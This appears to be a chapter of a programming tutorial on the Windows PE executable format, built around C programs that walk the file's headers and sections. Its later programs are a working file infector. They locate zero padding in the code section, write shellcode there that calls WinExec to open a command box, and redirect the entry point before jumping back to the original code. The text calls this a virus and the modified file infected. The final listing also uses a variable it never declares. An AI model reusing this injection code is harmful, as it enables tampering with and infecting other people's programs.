Windows PE File Format

 

Viruses are resident programs in memory, which came into being due to the loopholes in DOS. Earlier on, they were termed as TSR – Terminate and Stay Resident and were mostly coded in the C programming language or in assembler. These viruses were normally found present in the boot record or in the partition table and termed as COM file viruses. Then came a new genre of file viruses, which were mostly seen in (.exe) executable files.

 

However, now the range is too large. An executable file need not always end with the extension of exe, it can very well be a pif (program information file) file too. Besides, viruses are greatly seen in the form of word macros in doc files. Whatever be the file type, while injecting a virus into a file, one must be well-conversant with its internal structure.

 

This chapter explains how an executable file can be infected, thus calling for a complete cross-section of an exe file.

 

Prior to the Windows operating system, there was only DOS which had its own executable file format. The designers of Windows created their own executable file format called the PE or Portable Executable file format. However, this file format was totally different from that of DOS. The windows operating system had the capability of understanding the DOS exe file format but the reverse would need a miracle. Thus if average joe executes a dos exe file under windows, the windows operating  system would handle it, but if the reverse happened, i.e. a windows exe file under DOS, then DOS would get all lost and refuse to recognize the file as an exe file and emit a cryptic error 'Bad Command or file name'.

 

This indeed would lead to great confusion for the average user. Thus to straighten things out, all windows files start with a valid DOS header. As a result, if a windows executable was given to dos, it would display a polite message 'This program must be run under Windows.

 

The programs given below display the internal structure of a windows file but in a 'one step at a time' approach.

 

a.cpp

#include <windows.h>

#include <stdio.h>

HANDLE hfile,hfile1;

unsigned char *mappedfile;

void main()

{

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

mappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

printf("hfile=%p hfile1=%p mappedfile=%p\n",hfile,hfile1,mappedfile);

}

 

>copy c:\winnt\system32\calc.exe test.exe

 

Output

hfile=00000030 hfile1=0000002C mappedfile=00310000

 

As our code follows the rules of  C++, the header files, windows.h and stdio.h are required to bring in the prototypes. Header files are also significant  when macros and structure tags are used in the program.

 

In order to inject the code in an exe file, i.e. test.exe, the file needs to be opened. Therefore, the CreateFile function is used with the filename as one of its parameter. The file test.exe is a copy of the calculator program calc.exe.

 

This function takes seven parameters of which only three are useful. The first is the name of the program, the second the mode the file is to be opened in, in our case read and write and finally the fourth parameter specifies that if the file already exists on disk, then it should be opened rather than creating it. The function CreateFile opens the file for reading and writing as per our program and returns a HANDLE to this file.

 

A return value of handle which is basically a typedef to a void * is a technique windows uses to convey the message that the variable hfile is out of bounds. This variable cannot be used in any way other than a function parameter, thus displaying its value is simply of no use.

 

The file test.exe is loaded into memory through an array using the functions that accomplish this task. Thus it is not a difficult job, but any changes made to this file will be in memory and not on disk  hence 'saving to disk' task has to be done manually. Nevertheless, with the help of two functions, CreateFileMapping and MapViewOfFile the file is loaded  into memory.

 

The first function, CreateFileMapping takes one more parameter besides the file handle. This paramter gives the write permission to the file. The MapViewOfFile function specifies the access rights and the value returned by it is a void * and hence the cast. Casting is a necessary evil while coding in C++ .

 

The value of mappedfile shown as 310000 is where the contents of the file test.exe are loaded and our next program simply verifies this declaration.

 

a.c

#include <windows.h>

#include <stdio.h>

HANDLE hfile,hfile1;

unsigned char *pmappedfile;

void main()

{

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

printf("%c%c\n",*pmappedfile,*(pmappedfile+1));

*pmappedfile = 65;

}

 

Output

MZ

 

This program displays the first two bytes of an exe file under windows. These happen to be the ASCII values of M and Z. Every file under DOS begins with a signature MZ. Again, as every file under windows is also a DOS file , the above signature are visible there too and the output simply proves this point. Next, the first byte is changed to A or 65 from M.

 

When the program quits out, the system changes the first byte of test.exe on the disk also . Now try executing test.exe at the dos prompt.  You will see an error stating that the file is not a  valid Windows executable. 

 

Undo the above damage by changing the last line in the program to

*pmappedfile ='M';

 

and run the program. The file test.exe now executes as before.

 

a.c

#include <windows.h>

#include <stdio.h>

HANDLE hfile,hfile1;

unsigned char *pmappedfile;

void main()

{

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

printf("e_lfanew=%d\n",pimagedosheader->e_lfanew);

}

 

Output

200

 

We would like to repeat ourselves that every executable file under windows starts with a dos program and the first two bytes have to be MZ. Once the DOS program ends, then comes the windows header . Microsoft did not hard code the size of this dos program but with the DOS file header comes one field e_lfanew which stores the size of the DOS program. This value in our case is 200 .

 

a.c

#include <windows.h>

#include <stdio.h>

HANDLE hfile,hfile1;

unsigned char *pmappedfile, *dummy;

void main()

{

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

printf("%c%c %d %d\n",*dummy,*(dummy+1),*(dummy+2),*(dummy+3));

IMAGE_FILE_HEADER * pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

printf("Machine=%x\n",pimagefileheader->Machine);

printf("NumberOfSections=%d\n",pimagefileheader->NumberOfSections);

printf("TimeDateStamp=%d\n",pimagefileheader->TimeDateStamp);

printf("PointerToSymbolTable=%d\n",pimagefileheader->PointerToSymbolTable);

printf("NumberOfSymbols=%d\n",pimagefileheader->NumberOfSymbols);

printf("SizeOfOptionalHeader=%d\n",pimagefileheader->SizeOfOptionalHeader);

printf("Characteristics=%x\n",pimagefileheader->Characteristics);

}

 

Output

PE 0 0

Machine=14c

NumberOfSections=3

TimeDateStamp=938257211

PointerToSymbolTable=0

NumberOfSymbols=0

SizeOfOptionalHeader=224

Characteristics=30f

 

In the next program, a variable called dummy is created that points to the location where file test.exe is loaded in memory. The value stored in e_lfanew which is 200 is then added to this location. The first four bytes at this position refer to the signature of the file. The output is signature of a PE file PE 00. All valid executables under windows must start with this signature.

 

After this magic number starts a header or structure called Image File Header which is defined in the header file winnt.h. The variable pimagefileheader is created to hold the start of this structure and then all the members of the structure are displayed. The first member is called Machine with a value of 0x14c.

 

This means that the machine the program is compiled on is either a 386 or a 486 or a 586. Each family of microprocessors has it own unique value. For example a DEC alpha would have a value of 0x183 and the MIPS 4000 0x166. At present, these machines are only seen in museums.

 

An exe file has different fragments like code, data, resources etc. These different entities cannot be mixed up and placed together. They require their own space for various reasons for eg, code is executable whereas data is not. Thus different entities are placed in different compartments or sections. The second member of the structure gives a count on the sections in the file. A little later in this chapter, we will display the details of every section. For now, we have three sections.

 

The next field is the number of seconds from the 31st of December 1969 4 PM that this file was created by the linker. The documentation does not give any details whether the time shown is  when the linker started creating the file or stopped creating.

 

The PE file format also applies to obj files created by the complier and the next two fields deal with symbols which is what the compiler understand. Just to clarify, every function to the compiler is a symbol.

 

The second last field holds the size of the next structure called the Image Optional Header which is 224. This header follows the Image File Header.  The next example displays the members of this gigantic structure.

 

The last field gives some more information about the exe file in a series of bits. If the first bit is on, then there are no relocations in the file. Similarly the second bits decides whether the file is an obj or an exe file etc.

 

a.c

#include <windows.h>

#include <stdio.h>

void main()

{

HANDLE hfile,hfile1;

unsigned char *pmappedfile, *dummy;

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

printf("Magic=%x\n",pimageoptionalheader->Magic);

printf("MajorLinkerVersion=%d\n",pimageoptionalheader->MajorLinkerVersion);

printf("MinorLinkerVersion=%d\n",pimageoptionalheader->MinorLinkerVersion);

printf("SizeOfCode=%ld\n",pimageoptionalheader->SizeOfCode);

printf("SizeOfInitializedData=%ld\n",pimageoptionalheader->SizeOfInitializedData);

printf("SizeOfUninitializedData=%ld\n",pimageoptionalheader->SizeOfUninitializedData);

printf("AddressOfEntryPoint=%x\n",pimageoptionalheader->AddressOfEntryPoint);

printf("BaseOfCode=%x\n",pimageoptionalheader->BaseOfCode);

printf("BaseOfData=%x\n",pimageoptionalheader->BaseOfData);

printf("ImageBase=%x\n",pimageoptionalheader->ImageBase);

printf("SectionAlignment=%x\n",pimageoptionalheader->SectionAlignment);

printf("FileAlignment=%x\n",pimageoptionalheader->FileAlignment);

printf("MajorOperatingSystemVersion=%d\n",pimageoptionalheader->MajorOperatingSystemVersion);

printf("MinorOperatingSystemVersion=%d\n",pimageoptionalheader->MinorOperatingSystemVersion);

printf("MajorImageVersion=%d\n",pimageoptionalheader->MajorImageVersion);

printf("MinorImageVersion=%d\n",pimageoptionalheader->MinorImageVersion);

printf("MajorSubsystemVersion=%d\n",pimageoptionalheader->MajorSubsystemVersion);

printf("MinorSubsystemVersion=%d\n",pimageoptionalheader->MinorSubsystemVersion);

printf("Win32VersionValue=%d\n",pimageoptionalheader->Win32VersionValue);

printf("SizeOfImage=%d\n",pimageoptionalheader->SizeOfImage);

printf("SizeOfHeaders=%d\n",pimageoptionalheader->SizeOfHeaders);

printf("CheckSum=%d\n",pimageoptionalheader->CheckSum);

printf("Subsystem=%d\n",pimageoptionalheader->Subsystem);

printf("DllCharacteristics=%x\n",pimageoptionalheader->DllCharacteristics);

printf("SizeOfStackReserve=%x\n",pimageoptionalheader->SizeOfStackReserve);

printf("SizeOfStackCommit=%x\n",pimageoptionalheader->SizeOfStackCommit);

printf("SizeOfHeapReserve=%x\n",pimageoptionalheader->SizeOfHeapReserve);

printf("SizeOfHeapCommit=%x\n",pimageoptionalheader->SizeOfHeapCommit);

printf("LoaderFlags=%d\n",pimageoptionalheader->LoaderFlags);

printf("NumberOfRvaAndSizes=%d\n",pimageoptionalheader->NumberOfRvaAndSizes);

}

 

Output

Magic=10b

MajorLinkerVersion=5

MinorLinkerVersion=12

SizeOfCode=75264

SizeOfInitializedData=15872

SizeOfUninitializedData=0

AddressOfEntryPoint=134ef

BaseOfCode=1000

BaseOfData=14000

ImageBase=1000000

SectionAlignment=1000

FileAlignment=200

MajorOperatingSystemVersion=5

MinorOperatingSystemVersion=0

MajorImageVersion=5

MinorImageVersion=0

MajorSubsystemVersion=4

MinorSubsystemVersion=0

Win32VersionValue=0

SizeOfImage=102400

SizeOfHeaders=1536

CheckSum=113241

Subsystem=2

DllCharacteristics=8000

SizeOfStackReserve=40000

SizeOfStackCommit=1000

SizeOfHeapReserve=100000

SizeOfHeapCommit=1000

LoaderFlags=0

NumberOfRvaAndSizes=16

 

This program displays the members of the Image Optional Header which are used to write our so called virus. The header starts after the Image File Header, so the size of Image File header is added to the pointer that points to the start of the Image file header.

 

A short description of some of the fields.

 

This header starts with its own magic number, 0x10b. This is followed by the major and minor number of the linker that produced the exe file. In our case it is 12.5. Then comes the size of code in bytes  present in the file, 75264. The size of Initialized data is meant for variables that have been initialized. The size of UnInitialized data is the space taken in memory when the file is loaded but no space is reserved for the file on disk.  The next field is the most crucial one called the entry point. This field has an address which is presently a value of  0x134ef. This is the address of the first instruction that will be executed in memory. This field is defined to be an RVA or a relative virtual address.

 

The operating system has not been given any instruction as to where it should load the program in memory. However it uses the value stored in the field called ImageBase, which in our case is 1000000. Once it identifies this position, the loader then jumps to address 0x134ef, base of code, from this image base to execute the first instruction. This instruction actually is thus stored at 1000000 plus 0x134ef, i.e. 0x10134ef. Thus to calculate the actual address we add the Image Base to the RVA. An RVA is always an address from the Image base.

 

The Base Of code holds the address of the code in memory, and this value is also given in the section table. The next field Base of Data is about the data section when loaded in memory which again is available in the section headers.

 

The section alignment refers to the start of section in memory. In windows, the section alignment is usually 4096 bytes which means that every section will begin in memory at multiple of 4096. Thus if the code section is 90 bytes, then the data section to follow will begin 4006 bytes later and the memory area in the middle will be left unused. The file alignment is normally the sector size i.e. 512 bytes.

 

Each section on disk begins on a new sector, so even when a section is 5 bytes large the remaining 507 bytes are yet kept allocated for the same though unused. The rest of the fields are of academic interest to us as of now.

 

a.c

#include <windows.h>

#include <stdio.h>

struct section {

BYTE    Name[8];

DWORD   VirtualSize;

DWORD   VirtualAddress;

DWORD   SizeOfRawData;

DWORD   PointerToRawData;

char a[16];   

};

void main()

{

section *sec;

HANDLE hfile,hfile1;

unsigned char *pmappedfile, *dummy;

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

sec = (struct section*)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));

printf("Section    PointerToRawData  SizeOfRawData VirtualAddress VirtualSize\n");

for (int i=0;i<pimagefileheader->NumberOfSections;i++)

{

printf("%s      %05x             %05x         %05x          %05x\n",sec[i].Name , sec[i].PointerToRawData,sec[i]. SizeOfRawData,sec[i].VirtualAddress,sec[i].VirtualSize);

}

}

 

Output

Section    PointerToRawData  SizeOfRawData VirtualAddress VirtualSize

.text      00600             12600         01000          124ee

.data      12c00             00c00         14000          010c0

.rsrc      13800             02c00         16000          02b98

 

This program proceeds further to display the details of the section headers that immediately follow the Image Optional header. There is one section header per section and the size of each header is 40 bytes. A structure called section is created knowing that there is one in winnt.h just to explain things better. Even though we are interested in the first five members only, we yet need a structure 40 bytes long as thee section headers are stored back to back. This explains the padding of 16 bytes towards the end.

 

The Image File header has a member which gives the number of sections present in the executable. Thus using a for loop details of each section can be displayed.

 

The first member of the header is always the name of the section which starts with a dot generally and is restricted to 8 bytes. The section that carries code is always called .text, the one carrying data .data and the one carrying resources, ,rsrc. Even though the above name are predefined, using the compiler options, we can create our own sections and give it user-defined names that may not start with a dot.

 

The next member even though is called Virtual Size is the actual size of the section data. Similarly, there is one more field called Size of Raw Data which is the same value but rounded up to the section size on disk i.e. 512 bytes.

 

The field PointerToRawData is the position or offset of the section on disk. Thus its value is a multiple of section alignment or 512 bytes. The loader uses this concept to identify where each section starts on disk.

 

The VirtualAddress field is the offset when the section is loaded in memory where all values are a multiple of 1000 hex. This is where the sections are to be found in memory.

 

a.c

#include <windows.h>

#include <stdio.h>

struct section {

BYTE    Name[8];

DWORD   VirtualSize;

DWORD   VirtualAddress;

DWORD   SizeOfRawData;

DWORD   PointerToRawData;

char a[16];   

};

void main()

{

unsigned char vcdcode[]="\xcc";

section *psection;

HANDLE hfile,hfile1;

unsigned char *pmappedfile, *dummy;

long positionofvcd;

int howmanyzeroes=0,i;

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

psection = (struct section*)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));

int totalsize = psection->PointerToRawData + psection->SizeOfRawData;

for(positionofvcd=psection->PointerToRawData;positionofvcd <= totalsize;positionofvcd++)

{

if(pmappedfile[positionofvcd]==0)

{

howmanyzeroes++;

if(howmanyzeroes==69)

break;

}

else

howmanyzeroes=0;

}

positionofvcd -= 65;

printf("positionofvcd=%x\n",positionofvcd);

pimageoptionalheader->AddressOfEntryPoint = positionofvcd + psection->VirtualAddress - psection->PointerToRawData;

int sizeofvcd = sizeof(vcdcode);

for(i =0; i<sizeofvcd ;i++)

pmappedfile[positionofvcd+i]=vcdcode[i];

}

 

Output

positionofvcd=12af3

 

We have attempted to do something significant in this program. On executing the above program, the program test.exe gets infected but in a rather unique way. Thus when the executable test.exe is started, it displays a message box stating that a breakpoint interrupt has been called. This thus implies that instead of the code of the program test.exe being called, the breakpoint interrupt 0xcc has been encountered.

 

Now to the workings.

A variable totalsize is initialized to denote an offset that points to the end of the section. This offset is achieved by adding the SizeOfRawData to the PointerToRawData field which points to the section start.

 

The next goal is to find the place in the .text section where there are 69 consecutive  zeroes. This position within the .text section is required as we will be copying our code or vcd (virus code) here thus not overwriting the actual code. The text section like all other sections will be zero or null padded till it reaches the section alignment. Thus finding 69 consecutive zeroes is not too difficult.

 

In the for loop, the variable positionofvcd is set to the start of the .text section on disk. Nevertheless, in an extreme case where we cannot find 69 consecutive zeroes, we would like the loop to terminate when it reaches the end of the sections.

 

The file on disk and the bytes in pmappedfile array is the same, so we check the byte in memory since it is easier using the array notation. The pmappedfile refers to the start of memory where the file is loaded and positionofvcd is the offset. When the value at the offset is zero, the variable howmanyzeroes is incremented by one.

 

Thus at any point in time variable howmanyzeroes gives a count on the consecutive zeroes passed over. Also, when a non zero value is encountered, the else block gets called where the variable is reset to 0 again. Simultaneously, in the if statement a check is performed whether the variable howmanyzeroes is 69. If so, the loop is terminated as 69 consecutive zeroes in the file have been found.

 

The offset variable positionofvcd however is at the end of the 69 consecutive zeroes. Therefore to reposition it to the start, the value must be subtracted by 69. We subtract 65 instead just to keep 4 zeroes. What is 4 zeroes between us. This shows no errors and everything works as advertised.

 

The next task is to change the entry point RVA. Just to refreshen your memory, the entry point points to the first byte of code that is to be executed and it is an RVA. The value for this field should now point to the start of 65 consecutive zeroes.

 

The position of vcd is an offset from the start of the file and therefore the start of the section stored in the PointerToRawData member of the section structure is subtract from it. The sec variable points to the .text section thereby giving an offset from the beginning of the text section. However our objective is to get the offset from the image base and therefore the Sections VirtualAddress stored in the section structure is added to convert it into an RVA. If we execute the program at this stage, the loader would load test.exe into memory and then executed our code which simply comprises 65 consecutive zeroes.

 

So the next job is to add our code that is to executed. For this purpose, an array of chars called vcdcode is created which currently holds only one byte, i.e. CC the op code for a breakpoint. Later the actual code will be inserted in this array. The code bytes of this array is copied at the memory location of the consecutive zeroes. The variable positionofvcd has the offset as to where these bytes need to be copied. The system as always will write these bytes to disk.

 

In this manner, the first of the zeroes is replaced with a breakpoint. Now, when we run our program and then run test, we see the breakpoint interrupt generated. Simply click on ok and proceed to the next program that does much more.

 

a.c

#include <windows.h>

#include <stdio.h>

struct section {

BYTE    Name[8];

DWORD   VirtualSize;

DWORD   VirtualAddress;

DWORD   SizeOfRawData;

DWORD   PointerToRawData;

char a[16];   

};

void main()

{

unsigned char vcdcode[] = "\xcc\x55\x8B\xEC\x51\xC7\x45\xFC\x63\x6D\x64\x00\x6A\x05\x8b\xc5\x83\xe8\x04\x50\xB8\xcc\xcc\xcc\xcc\xFF\xD0\x8B\xE5\x5d";

section *psection;

HMODULE hloadlibrary;

HANDLE hfile,hfile1;

unsigned char *pmappedfile, *dummy;

long positionofvcd,haddresoffunction;

int howmanyzeroes=0,i;

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

psection = (struct section*)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));

int totalsize = psection->PointerToRawData + psection->SizeOfRawData;

for(positionofvcd=psection->PointerToRawData;positionofvcd <= totalsize;positionofvcd++)

{

if(pmappedfile[positionofvcd]==0)

{

howmanyzeroes++;

if(howmanyzeroes==69)

break;

}

else

howmanyzeroes=0;

}

positionofvcd -= 65;

pimageoptionalheader->AddressOfEntryPoint = positionofvcd + psection->VirtualAddress - psection->PointerToRawData;

int sizeofvcd = sizeof(vcdcode);

hloadlibrary = LoadLibrary("kernel32.dll");

haddresoffunction = (unsigned long)GetProcAddress(hloadlibrary,"WinExec");

for (i = 0; i < 4 ; i++)

vcdcode[sizeofvcd-10+i] = haddresoffunction >> (i * 8);

for(i =0; i<sizeofvcd ;i++)

pmappedfile[positionofvcd+i]=vcdcode[i];

}

 

The best way to understand this program is to run it and see the code being executed in the debugger. Thus at the breakpoint interrupt click on cancel. The code shown below is displayed in the debug window and it is similar to what is written in the vcdcode array.

 

Just to sum up. The entry point RVA is changed to point to the newly inserted code and then file test.exe is executed. The breakpoint interrupt gets called. The bytes that we have in the vcdcode array are disassembled as

 

Output

CC                   int         3

55                   push        ebp

8B EC                mov         ebp,esp

51                   push        ecx

C7 45 FC 63 6D 64 00 mov         dword ptr [ebp-4],646D63h

6A 05                push        5

8B C5                mov         eax,ebp

83 E8 04             sub         eax,4

50                   push        eax

B8 AF A7 E9 77       mov         eax,77E9A7AFh

FF D0                call        eax

8B E5                mov         esp,ebp

5D                   pop         ebp

 

The explanation for the assembler code is the same, as from the previous chapter.

 

The first instruction is the breakpoint interrupt CC. Then 55 becomes push ebp. One of the many reasons a register is pushed on the stack is because its value is to be changed and eventually the original value is to be restored at the end of the code. A simple rule in assembler is whenever a register is changed, like decent people once the task is done, it has to be restored back to its original value. The next instruction replaces the contents of the ebp register with that of esp. The esp register tracks down the stack each time a value is pushed or popped off it. Thus by storing a copy of esp in ebp which will not be changed, we now have a reference to original position of the stack is prior to the vcd code being called. Besides there is now a fixed reference point off the stack to refer to values on the stack. When our vcd code finishes, it should restore the stack to its original value. Thus the vcd code should once again copy ebp back to esp to restore the stack.

 

The actual work starts now. We push ecx on the stack. By pushing its value, we have actually allocated 4 memory locations on the stack, though its value is insignificant for the moment. The stack moves down by 4 and hence the difference between esp and ebp will be 4. Thus ebp-4 will represent the value we have just pushed on the stack.

 

The string cmd is to be placed on the stack. Thus the next instruction copies the ASCII values of c, m and d 63,6d and 64 on the stack at ebp-4, the position where we pushed the value of the ecx register. Being a little endian machine the 63h or c comes last. The square brackets in assembler reference a pointer.

 

If ebp had a value 100, then characters cmd would be stored at locations 96 onwards. Thus we have allocated 4 bytes on the stack and copied our string there. In assembler, we are allowed to write to memory that has been previously allocated.

 

The WinExec function takes two parameters, the name of the program to be executed and the initial mode the window should be open in, The value 5 means normal, therefore we push 5 on the stack, the parameters are to be pushed in the reverse way. Then the address of where the string cmd starts in memory is to be placed which in our case is ebp-4.

-*-*-*

To make matters easier, we first mov ebp into eax, subtract 4 from it and then push this value on the stack. Finally, the function WinExec is called. However, our problem is that we have no clue where this function starts in memory. Thus we use function LoadLibrary to retrieve the address location of kernel32.dll as this dll that contains the code of the WinExec functions starts in memory.

 

Then using function GetProcAddress, we retrieve the address of this function in the dll and thus in memory. Once the value is attained, using the mov instruction this value is placed into the eax register. The op code B8 followed by the address in memory of our function does this job. Then the address of WinExec is to be placed at this point which is 10 bytes from the end. For this reason, we extract each bytes of the address of WinExec which is 77e9a7af and place in into our array vcdcode. This value of WinExec will change from Windows version to version and service pack and hence it is not hard coded.

 

Once its address is obtained, it is moved into the eax register and then the call eax op code is used to call the code of WinExec. Resultantly, this opens the DOS command box.

 

Mission Accomplished.

The clean up task now requires the stack to be placed back to its original so we move the value of ebp back into esp, thus saving the value of ebp on the stack. As the stack is now on this value, we simply pop the original value of ebp back into the ebp register.

 

A small glitch here is that in spite of opening the dos box, the original code does not get called at all. This is rectified in the next program.

 

All that this program does is hands over control back to the original code.

 

a.c

#include <windows.h>

#include <stdio.h>

struct section {

BYTE    Name[8];

DWORD   VirtualSize;

DWORD   VirtualAddress;

DWORD   SizeOfRawData;

DWORD   PointerToRawData;

char a[16];   

};

void main()

{

unsigned char vcdcode[]="\xcc\x55\x8B\xEC\x51\xC7\x45\xFC\x63\x6D\x64\x00\x6A\x05\x8b\xc5\x83\xe8\x04\x50\xB8\xcc\xcc\xcc\xcc\xFF\xD0\x8B\xE5\x5d";

section *psection;

HMODULE hloadlibrary;

HANDLE hfile,hfile1;

unsigned char *pmappedfile;

long positionofvcd,haddresoffunction;

int howmanyzeroes=0,i;

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

psection = (struct section*)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));

int totalsize = psection->PointerToRawData + psection->SizeOfRawData;

for(positionofvcd=psection->PointerToRawData;positionofvcd <= totalsize;positionofvcd++)

{

if(pmappedfile[positionofvcd]==0)

{

howmanyzeroes++;

if(howmanyzeroes==69)

break;

}

else

howmanyzeroes=0;

}

positionofvcd -= 65;

long goingback = pimageoptionalheader->AddressOfEntryPoint+pimageoptionalheader->ImageBase;

pimageoptionalheader->AddressOfEntryPoint = positionofvcd + psection->VirtualAddress - psection->PointerToRawData;

int sizeofvcd = sizeof(vcdcode);

hloadlibrary = LoadLibrary("kernel32.dll");

haddresoffunction = (unsigned long)GetProcAddress(hloadlibrary,"WinExec");

for (i = 0; i < 4 ; i++)

vcdcode[sizeofvcd-10+i] = haddresoffunction >> (i * 8);

for(i =0; i<sizeofvcd ;i++)

pmappedfile[positionofvcd+i]=vcdcode[i];

unsigned char jumpback[]="\xB8\xbb\xbb\xbb\xbb\xff\xe0";

for (i = 0; i < 4 ; i++)

jumpback[1+i] = goingback >> (i * 8);

for(i=0; i<7 ;i++)

pmappedfile[positionofvcd+sizeofvcd+i-1]=jumpback[i];

}

 

The AddressOfEntryPoint member stores the address of code that is to be executed. Thus before changing its value to point to our vcd code, we save the original value in a variable called goingback. The point to be noted is that the address is an RVA therefore to reach the actual physical address we add the ImageBase value to it.

 

Next is we create an array jumpback that will carry code that jumps back to the original entry point. Once again it starts with op code b8 that moves a value into the eax register. As before, a for loop is used to write the actual jump address in this array using the goingback variable.

 

Then these 7 bytes are added to the end of the vcd so that after the dos box gets created and it is shut down, the original code is executed. The actual bytes that get executed are as follows.

 

B8 20 24 01 01   mov         eax,1012420h

FF E0 jmp         eax

 

The difference between a call and jmp instruction is that in the jmp instruction the next instruction address is not saved on the stack there is no need to return back.

 

Thus the code will infect a file in such a way that each time the file is executed, a dos box gets created and then the original code gets called.

 

The Exports Table.

 

e.c

void __declspec(dllexport) abc()

{

}

void __declspec(dllexport) pqr()

{

}

void xyz()

{

}

void aaa()

{

}

void bbb()

{

}

void ccc()

{

}

 

e.def

LIBRARY e.dll

EXPORTS

xyz @5

aaa @7

bbb @12

 

cl –c e.c

link /dll /def:e.def e.obj

 

The above program continues with what we are learning about the structure of a PE file. In file e.c, there are six functions namely abc, pqr, xyz, aaa , bbb and ccc. These six functions would be placed in a dll, but only five of them would be allowed access by other code. By default, code in dll is not exposed to the outside world.

 

There are, as always, two ways of giving permission to access code present in the dll. The first approach is by tagging the functions with the keyword __declspec alongwith the option dllexport. The first two functions abc and pqr are exported in this way.

 

The second alternative is by using a definitions (.def) file. A def file has a certain format, which is clearly seen in file e.def. It starts with the reserved word Library and then the library name. If the name of the library is changed to e1.dll, the linker names the dll as e1.dll. Then the keyword EXPORTS is specified followed by a list of functions that are exported. Thereafter, the function names, i.e. xyz, aaa and bbb are given.

 

